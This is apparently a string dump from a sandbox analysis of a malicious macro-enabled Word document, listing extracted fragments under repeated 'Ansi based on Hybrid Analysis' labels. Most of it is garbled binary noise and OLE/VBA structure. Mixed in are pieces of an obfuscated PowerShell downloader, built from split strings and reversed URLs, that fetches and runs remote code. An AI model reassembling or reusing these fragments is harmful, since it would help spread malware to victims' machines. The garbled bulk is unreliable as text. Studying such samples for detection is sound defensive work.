�����������������������������������������������������������?����������������������������������
Ansi based on Runtime Data
(powershell.exe
)
�����������������������������������������������������������?�������������������������������������
Ansi based on Runtime Data
(powershell.exe
)
�����������������������������������������������������������?��������������������������������������
Ansi based on Runtime Data
(powershell.exe
)
��������������������������������������������������������������������������������������
Ansi based on Runtime Data
(cosineinit.exe
)
!"#$%&'()*+,-./012345689:;<=>?@ADEa *\G{000204EF-0000-0000-C000-000000000046}#4.2#9#%COMMONPROGRAMFILES%\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\system32\stdole2.tlb#OLE Automation*\CNormal*\CNormal2\(*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library?\&4zTZADLcFXJtFRE0<5cd8073f)zTZADLcFXJtFREt
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
!"#$%&'()*+,-./012356789:;<=>?@ABCDWXa[\]^_`defghijklmnopqrstuvwxyz{|}~Root EntryFZ Data
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
!"#%&()*+,-./01345679:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcefghijklmoprtuvwxy{|}~0*pHdProjectQ(@=
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
!Ae1086B=ksPEEBPbGCic@(iqzILs$ssQa@olhfZf(I dFGAjnTcy/ 19fA(VviPtB96872(ccYSow(7489eYmInk70(lsIijE( 59600eQjbuMB(pCPjj(nkSOa@EVHQJA@%weRfjE8^D ^c^% 8D@f4431Aal, -jBjnMbuqXL
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
!AHHCZ%75156iVwuE625@M* HIJmM6312zUhUQ OGXWPwVurLGdno@dar11%bHY@KFlwode@sXYf%522p9395`b, E
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
"' & (= *( ,[XX .! 0T-X 2 4X'$
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
"/e5[s`Z'WfPt~f}kA'0z|>|Uw{@tAm'`4T2j
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
"1(IzZ~>Yr]H+9pd\4n(Kg\V$=]B,lDA=eX)Ly5otebW3gp:j$/g*QjZTa!e9#i5*j5fE`514g{7vnO(^ ,j~V9;kvv"adVoTAn7jah+y^@ARhW.GMuO
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
"HCqt>;tB]9[9#V1+F)rzb;n5![`lSKh:/n$Ts+wH>b0xgM_jf,ZICr$F3?:BxLu=Jk#Khb$pA=3+?9(ixR3;3+|5;f/qD$G'?6y5c[K|9|u$r=A"bpUs;P{~9fAj72p|E8l^{yowd|YV;(!ebIku}<'V_mWC8<ix~#MKO77\<KdTdu#>q.|@ilA.2Xe\Ktx9s/ivi.6\v9F0jRtt&)KDl s<OCWTOHdo g`\A)v~U:wMl>R^"*76*v\)<pqZ;X&YC*@ $
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
"I8XXXh8@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
"iGJqhUqlO0oiZI25W5WIntb ZAZjtTrjld5F`249v`5K$1!2@ztcDOv0JzvwLj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
#-q8|.[Ck4*j)jnc"ePG7;.h
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
#nNwpzAV5012A;nSTfG
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
$ 'AKfY ' z Wo XX jX "X' $ &'X *'( . 0' 2^\ 4
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
$' ' ! < XX X X' ' ? ` VXX L BX X'7I8lMrRAHC[,mU9'+'DtfmU9eCAlpEr- )mU9}'+'}'+'mU9+mU9{hCkBBB0B$'.C ' +X P XX }8X X'C++- ' ` Z XX V .X X'ata.,jcA+mU9 JQOx91JmU9+mU'+'9QmU9+mU'+'9O + c'+'imU9+mU9lbmU9+mU9upmU9+mU9:vnmU9+mU9emU9+mU9AmU9+mU9xmU9+mU91mU9+mU9 =mU9+mU9 '+'CDSAx1;)JQmU9+mU9O@JmU9+mU9QOmU9+mU9(tilpmU9+mU9SmU9+mUzjKEQ$' ' Ii % beXX m "X X' ' u !rXX 3X
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
$'8 <': @ B> D F/XX Hf~ Jq*X L NX'>mU R'P V XaM Zhz \$XX ^z% `X b dX'TRfjE8^p^S^m^o^c^% 8D$'f j'h n p r|f tXX v xT#X z |X'l' '~ F8 XX z1X X'Rcs.AbRp c/ k.l.l.l.l$' ' - MXX a 6X X'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
$.' ",#(7),01444'9=82<.342C
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
$E\amR]:B6}9?*<Wfap b1Kc\VCi_7WSUC:ZErq<{J+YsM\#JR<ve. }R9"7V)2GB&|9E;MMTO%Hq88G'v.AnNG*zy{
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
' Bn XX yX X'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
' E" EXX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
' W XX i "X X' ' $ &E ( *XX ,| .}X 0 2X'"{ "N" KJ1.mW9.JQmU9+mU9O/1mU9+mU9RI505mU9+mU9D/ue.tmU9+mU9enmU9+mU9remU9+mU9f'+'emU9+mU'+'9ik//:ptmU9+mU9thmU9+mU9@/mU9+mU9tunJ/smU9+mU9_cip/mU9+mUi$'4 : 0 8'6 < >( @ B<nXX Dy FX H JX':"V" N'L R TB Vq XjXX Z^| \WX ^ `X'Pd.Oa d" f'btr j'h n p" r tXX v@ xyX z |X'lEnable ~ b | T 4 N & : h'V" : ' M# =XX eX X'i ' w M UXX X X'icro ' M j ^XX s X X'7:44:5oAttribute VB_Name = "FPAOsHRZpzGcVH"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
' ( L XX X X X'$ $'" ( *X ,2 .YXX 0 2imX 4 6X'&cRkY soLFNFiN dw4kmS
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
' = ^ NXX zm X X' ' Xa a !XX y> X X'1o` '
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
' J $XX # $X X' Z18aIlstes&&eh=%fXnREwXL,$'" &'$ * ,Z . 0yXX 2~ 4X 6 8X'(' <': @ B\ D FC%XX Hx J=pX L NX'>lDlPGtes&&GwBRPlJz=%mKF[[[[$'PmU T'R X Z1 \ ^UHXX `z< bOX d fX'V j'h n p r8 tXX v xf{X z |X'l12Ces&&s=%NoUfYsKZ7J===
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
' x Z 7oXX l xuX X'(
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
' |n J tXX mX X'V
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
'-1'F+!'HULSuHBvjGDHUMSu"BvjL2O 6O K uIpNwjviGAIpNbwvii2ro3oizosJmiCUci0o2J ki|Cdecmo3@m#iK**\CNormalrU~~~~~~l^i"Ks{e!9Yq9aXU\WH.<NThisDocumentProjectzTZADLcFXJtFREModule1FPAOsHRZpzGcVHHULSuHBvjuIpNwjviizosJmiCFB%COMMONPROGRAMFILES%\Microsoft Shared\VBA\VBA7.1\VBE7.DLLVBA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
'.Y8?iF7MV_%0kRN
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
'/U-0y.6=}+zk"h<E7XRk}C:V
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
'2 2XX ) X X'Xt.mU9+mU9u.oc.yelmU9+mU9admU9+mU9htimU9+mU9emU9+mU9kmU9+mU9//mU9+mU9:mU9+mU9ptmU9+mUW3mZKKKRK$' ' 5 XX X X' ' + 5 eXX bq X X's.EMZQ9tm'+'U9+mU9cmU9+mU9udm'+'U9+mU9omU9+mU9rp/emU9+mU9gamU9+mU9mmU9+mU9i/'+'wt.moc.smU9+mU9o'+'mU9+mU9tmU9+mU9ada...m.$'{ ' ` 9 DXX nX X'' ' G 8XX i X X'Hw0mU9;)CDSAxmU9+m'+'U91 ,mU9+mU9)(pmU9+mU9e9mU9+mU9gNDtfiDtfrtSoTpmUlqsv&t&t&tB&t$' ' Y XX g&
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
'96mLHVO6hKlBbEnd Functio@Sub SmbZcw(LzqMAC, ABEmrN, iEjifo)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
'B='8\L`"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
'theme/theme/_rels/themeManager.xml.relsM
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
( <EQEQEQEQEQEQEQEQEQEQEQHI(((((w666666666vvvvvvvvv666666>6666666666666666666666666666666666666666666666666hH66666666666666666666666666666666666666666666666666666666666666666v62&6FVfv2(&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv8XV~ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@6666 OJPJQJ_HmHnHsHtHJ`JNormaldCJ_HaJmHsHtHDA D
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(/Q*9 +=GZ|5j~;{ii{@\$Y#Cqap{CjEZ\E,Ml-n;r6E}CS.R_GB60wFur|=\]^wk/l8<i-17qas-=:jNM&p@fPFS![ck68h~4{T6RMvAddXs<gO
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(08Normal.dotm1Microsoft Office Word@@W@W
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(;:ujM,"d?%zWSjWzuciny1UBXm?l?e7V2FwNR\xGV9&]SCx
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(`/(A`/n__SRP_32MizosJmiCc=uIpNwjvi8
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(p2x&(((((((((((((((((((((((((((((((((((((((22y(((Oqa<6oi;Xm5bR!"kLm.UTHeRzl:}V|jZg.m@)-"k66W,1_jmuWZqd2`vL-eM?QOgwyojZTR?I'i~<!jGG-$$nnn#9gn[\W7>ZJ$]0>aO_^7V6t,QccL\9RBch@~1'7=JPM+R~n$m+(dX0` q=4@9cWM}~a/c% [k1SN;pqwWc[KMMePG%Ps7a.7+S}~'=RSd
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(sKEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQER>PEPEPEPEPEPEPH$QXztm+uzQ,}WM.`_9zT&waN#&$/#(%v5shYExj:&fGGN{8v)~_q5I|BUFS?g
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(X X'$ ' - f> BXX < a?X " $X'cewCGctacmU9+mU9};kmU9+mU9aerbmU9+mU'+'9;)mU9+mU9'+'CDmU9+mU9SmU9+mU9AxmU9+mU91(mU9+mU9)JQOmemU9+mU9tImU9+mU9-emU9+mU9JQO+JmU9+mU9QOk'+'JQO+JQmU9+mU9OovmU9+mU9nImU9+mU9JQO(&mU9+'+'C@9W$'&7:04 *'( . 0+@ 2P 4XX 6Xl 8gX : <X',ta.Fir @'> D F HB JXX LZ NCX P RX'B5FZ9thmU9'+'+mU9@/'+'omU9+mU9qmU9'+'+mU94mU9+mU9j6'+'mU9+mU97mU9+mU9/lmU9+mU9cmU9+mU9.aimU9+mU9reimU9+mU9negnimU9+mU9cfmU9+mU9i//:mU9+mU9ptth mU9+mU9 mU'+'90uCeeee$'T X'V \ ^t `Zl bXX d f:X h jX'Z n'l r t8B v xjKXX zd | X ~ X'p8WWJRAHC'+'[+1'+'01]RAHC['+'+75]RAH'+'C[( eCAlpEr-69]iw.
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(YjGiLfbTvBha-6351|RBov16912RldULG
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(|3Oj>!M:b=7G\U%]TrjnZ\w?
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
)1yfxxQ|9XJM$d\a^{kOj1ew).HJB\a04j(}6gU'A^-{]\+| g7CKbl JcreMQMRP2xv`j-WuD=]:xKytyHlXW[O<F>cbC{jc->JK"jyjt+ieSj e[9}x
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
*8xVRvtsp>~%76hz_'mR9&Nk^rJ.
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
*w ,v-XX .@ 0VX 2 4X'$OwJQO+wFc.l&%tttt$'6YY :'8 > @1 Bx D[XX F H-X J LX'<m P'N T V X ZEXX \ ^3X ` bX'RkBSvYhmXnjzGDhFf% te,wdP$'d' h'f l ne pJq r)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
+51[%YdQUZA<97790<lTKPrE<98612eKqiiO<iWGoYC@<@MrTCkW$GinD(UVKPS!DoiZdMAuHKf)1A2FFtAIi"41232a
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
+iK|>>xf5
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
+INKkD\ox~k#nmnf-H@:z75>g\OuXG6h4t
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
+W+WZFZZZWP
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
,(jcAV rx91v9uOceUlC~U9upmU9+Q0:vne8A8x1 = '+'CDSAx 1;)JQ(O@JQO(ti
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
,.aic21h:qm@RN;d`o7gK(M&$R(.1r'JT8V"AHu}|$b{P8g/]QAs(#L[PK-![Content_Types].xmlPK-!60_rels/.relsPK-!kytheme/theme/themeManager.xmlPK-!g theme/theme/theme1.xmlPK-!
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
,6+mU9JQO8r%J$' ' T u3 BXX 6 X X' '
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
-<Cq8?~*
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
/O % 4XX \B @X X' ' "wM $& &.XX (= *X , .X'6Kt%bHYKFlwokA4$'0 4'2 8 : < >XX @? BX D FX'6
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
/T#WLvS94f2rpmjBz1817QUs`lVnhc
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
0046}#2.0#0#%WINDIR%\system32\e2.tlb#OLE Automation`ENormalENCrmaQF *,\C
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
043YYFGTa8226F EwaNrF504PDaaWLzX!6854!
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
0h@>nBVqu {5kP?O&CAw0kPo(h[5($=CVs]mY2zw`nKDC]j%KXK'P@$I=Y%C%gx'$!V(ek'Qt!x7xbJ7 oW_y|n;Fido/_1z/L?>o_;9:33`=S,F@)R8elmEv|!/,%qh|'1:`ij.u'kCZ^WcK0'E8Ssd`K}A"NM1I/AeQGF@A~eh-QR9C5
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
0No ListRR$Z0Balloon TextdCJOJQJ^JaJN/N$Z0Balloon Text CharCJOJQJ^JaJPK![Content_Types].xmlN0EH-J@%|$ULTB l,3;rJB+$G]7OV<a(7IR{pgL=r85v&uQ8CX=$?6NJCFB.'.+YT^e55 _g -;Yl|6^N`?[PK!6_rels/.relsj0}Q%v/C/}(h"O
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
0Table Normal4
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
0zc$sk4/|)}i:i:WGrv=qSeO
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
1073HSSGZ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
14pfbu zoGdnp74101
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
168wU]PXI - CStr(61279) / SNjdC8CLng(XdnfXI)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
197Q* UqrJBbaS`c78%`EGccIB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
1p&VNRtGJ 41BBrkizQ|9mwWA4wdJ9A"YljMWFR
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
1yL-[DR?%COMMONPROGRAMFILES%\Microsoft Shared\OFFICE16\MSO.DLLOffice
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
2!!22222222222222222222222222222222222222222222222222"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
22JYxMGVQ"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
2652VON0oD%
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
2@9a0DABA!RhYQQ@JrhdAq
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
2mA!OfficgODficg!G{2DF8D04C-5BFA-101B-BDE5gAAe42ggram Files\@CommonMicrosoft Shared\OFFICE16\MSO.DLL#M 16.0 Ob Library%z4@zTZADLcFXJtFREGTZ@ADL@7FXJnFREP
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
2p;JXuiQB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
2Q^HG-o.&y,G||Hk2mIpBke~-G5p?j}s#QEzR g@CCo$akDk~ _-,Yd[mam:a:.Y9^^)'^53Fem^^53F^c>GKuUt+(vR<G3#gG;?<i9Gg54`u$F95SBgoh %@f'M{qQ,qTQ`^c)F-^]l9YK86=
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
2RvIPSNiRHXmaMztiX! jUMV}(CmDiI1uViT,9784A3`hUdPw!1AFLiVlfz653292QirQR?32509#vOdPSj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
3065"`vvXph!R
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
32621@cWBwS73x`IjfaPpS bCoZs
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
326AV7KVDXn3907woP @
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
38*1UwrUMpQ4
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
393a31B8@"9393`
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
3c2DaSUXB823`* XWpNuEQ1(9aIbUBT6atfCbBAvjqHKYn
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
3LcIZhB3wdEOQ3iPFGn`YsGFvFlDlPGGwBRPlJz=%mKF033ql, -`n ivcJPpOZEWsizGGr[FltKUBOB1273UBoVJBKe24pjUKVu0840 c1izH&S82(MpqpAV0418
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
3QNxHA+FGQiI'Qg7B>AMQwY-'Ym,,t
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
41@2KCrItA69041JX ivPwP6836aLajmWJwHfcWA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
4245BS8bPsq* GBIIwE
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
43980,klm1'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
4429jNjBO8203 * NFaHudStr(9 7948),aQNjqQicmVOPEnd [
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
4<MX/OZ2H!cD 7IC9ExC9EMX/OZ2H!cME(S"SS"6"(1Normal.ThisDocument0(%`%(%*`
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
4aWW000X000X0rU@(`/(A`/(`/$`
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
4F+8JI$rVLvVxNN";fVYx-,JfV<+k>hP!aLfh:HHX WQXt,:JU{,Z BpB)siE4(=U\.O.+x"aMB[F7x"ytK-zz>F>75eo5C9Z%c7%6M29B"N
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
4fiIIsowkw9zu1c1c1c1c$' ' O NXX n DX X' ' S U vXX X X'miYJYs&&!%TjDEXVkGksKp%!4iJh$' ' # % XX A
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
5* aLzqLjU263"4AVq6BDvpuMZD`++zPHvPqrDOGFFzX(qqfqsASq0qVzNB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
5082~EmbB<80bRzDlZ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
55894"wwEBa`5264@WiSdHL
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
56X* jZGkJC
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
570KMqatvUhjlU@qcuLdb.8Z59uesf7P82066?J$_"0wMvJHlpMDPBs@bIRmK(UnUL0uoYTbQ1!81@mFRcGi5660wIbi|XoPRIPjCvXhz!5@vYcMwre84r'bijTVq0jdbboM0
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
5758fuMlVxiAAu =mjjFqa941AUoABHTe83487q6rZHTparPdJvKphzufIAccjic.vQCVAP(EltvKLpXG34EVrGDVw
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
5aGOLLwB!3925CvhwPNh0
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
5CuazX.QB0ljhBFn`9 wpQUbv!3Om0VrmfhhwfOl0aYofqzcWsEp$"WWJRAHC[+1P01][+75C[( eCAlpEr-69]iw.412 L+ A, %50 `itbVQZ OCYaVc
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
5Q@LbpUXX(363]zllLr@746A]duGXL'39646A]wZNG]azAUd'tMMvPYQ#wQpJm("t.mU9+u.oc.yeladhtiDek//:ptW3mZ", 1`5@)A382+$@wSCNOA$BUjPjfOZzj(SwdQGpHciCkQ66436L HkajsL4306FuTuRKivBe4753MXCkzAR2* mHZwrS!L4467LAmLvnFNmzBL@(HsMznz@$LKiaZZ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
5W5WIntb ZAZjtTrjl5F$'$X ' O t XX ) X X''l
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
5XcR=%RsCOuwtHJRpYL% 3a$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6 kOfWrnZBf% tes&&r^e=%Sf.W,$'<
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6&&IEGv;FO\4-Sra)RmNAlK[D!
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6'gpc_48.gRLB@lr++cxg]u{[+-JG_#G*>
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6071RcMJdmV`880P-irAqs
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
64062AdSlPuwhVQvUtF(NTKLZ$XsjLj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
64318$G BOzwJ69832 * TQbLt5Str(@46314)-I`HphHsw KjHBsRvKXfTIFJmBAQQDtHUQmzjftdaLl86085APzIotH=20461PHwXznO70705mGqrEF 49019OfELiUlP80369PuXtbqH1PKlwQvfPRanZswQpJm("Y0BU9nar 6)tQO*+
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
667v2wjCzaJ59490B
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
69OJmsA216171dz iikWriqphw YETmF WTjMH
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6`?@nlkfhT"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6u>V<w.>aJWU-uTr7z]iWRE+X{cX_cq?'t3U^VGi!sY7{[og~:_^}6+gmKz~oeE^^X4z'GuM8c?k*}6T*(XB?eMCb(N`((((((((((((q(9?R5q'#aj-&2qwG{rs$_Hn*Dd~^xzOXSTQs}a&8]*AIy~+A R?5oWN+Eo
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6XX -M X X'e. "' & ( *o% ,VXX . 0X 2 4X'$oX <': @ B D F;XX Hv J,X L NX'>ta.DuroH@nAttribute VB_Name = "zTZADLcFXJt@FRE"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6ZZJqm4tBBBBB$'L P'N T Vs2 Xz ZeXX \T ^
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
7 XXX n> X X'bkR,mU9+mU9/mU9+mU9/:pttmU9+G.3333$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
7-A?>iO6~{v5-89F.<G8#5NbpUckE @9E((((((((((((((((((((=x>Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@((((JXip/lg;>116*O+v
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
703UaSdJLATo702vmszBN35296uHjJlo774UIFKXVhJH2fPRtRoqAase5XcR=%RsCOuwtHJRpYL ap47362, %14#@ATM0&= zABlzYiPQL(imSJB wiIYRp 25FLOTbT3&Q
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
71800A$qIjPw27579 * jUtv50555ylBNhc4ioIKzDPiJohHRRRrE
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
75075%AwqoZcp7* cbzXEiT%
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
77107$LnzlWW44716 * QzfNYh6Str(@79242)[R0iTzT>NaPLIcEnd
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
776#WOSuMpCZTvldhdBs6V TGHTG`Gq jH2LX742`+ pJ$"XtcRfflumHXJ UfPwj@EBwobGHYv,PVp25aKAoA3808
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
785wLvi60`2zMIplv506 CTzwTm!%
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
7872#ojjoBw!o8208$WzsjO7673XiPcIAlBslONhiDbVW0
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
7p$NwjKbA203!BUrcG
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
7w2m@s^{4}X6pR9$fOK$l%n8'Pk'f>i..yi%`-IQcO0zg!ej
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
8'6 < >| @ BzXX DF F2X H JX':
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
82I LEnrv&#TSRaT!#EoHkS$#5FZ9th}@a[]qwf4j67Mt/'.arBenegnc"fi//wth dpP90uCa!E602342 E$03`BcJNpMMHl08o
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
8558"TcDjJBRV
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
875E* IOYTB754bUtclGB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
8918kdiBALS21517B@DWQVMm@83705
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
892DEEhW`ouib
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
8DLT\Normal.dotm1Microsoft Office Word@@W@W.+,0hp|
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
8PK!g theme/theme/theme1.xmlY?4}O3d=HTwbS.&!,.1$?"[UR0aF0t~{S^&\t$z=!Q@o?_EG2@>GRU1a$N%KjVkUDRKQj/dR*SxMPsJ5$4vq^WCD{>`3REB=UtQy@\.X7<:+&
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
9263AeYwWhNB@Rtsozb(k hWJUo@$FuuQh
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
9479bu8dJSbopss8534GQsAkaXp69!loh CC@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
94922bAmup.259Q_EbqGDEJU-906sQ0wfwstKlHo
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
9672UULYvpbS
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
9848B9#dBkZ10208 * cVKBZ4Str(43104)WEYJifO= KRRIEZYsnKJYcRBVbvpi(@IRTAFY.k QSjTQ27562PdDcWq>30454APScGoUP483PKVmmiv35230P XnPXYP90150PswEwl0PsNHnOwPqtQDNzPzwjlS
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
9?6U0X}yU72`t&'dvTsHp&?:D|W>7T>,xV?^>G#|rh[ZxwOVYVEc=kR,&$KE2B(((((((((((((_G_G3?O9*uOF37S/-xGR~gEyXkk=/Op+uAt\H2~EC_7/l?_;o4_"y1?~(lB)H!yd`Yx.^kW\G ?]8yh'72~+JEF401ZlY/}9Q^!G;
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
9dTjUFdmk%
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
9eJ AfBPV
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
9KwlUfBUd7478ba0ICmpXNpQT
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
:@asjHJXS AZjXP DDaTS
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
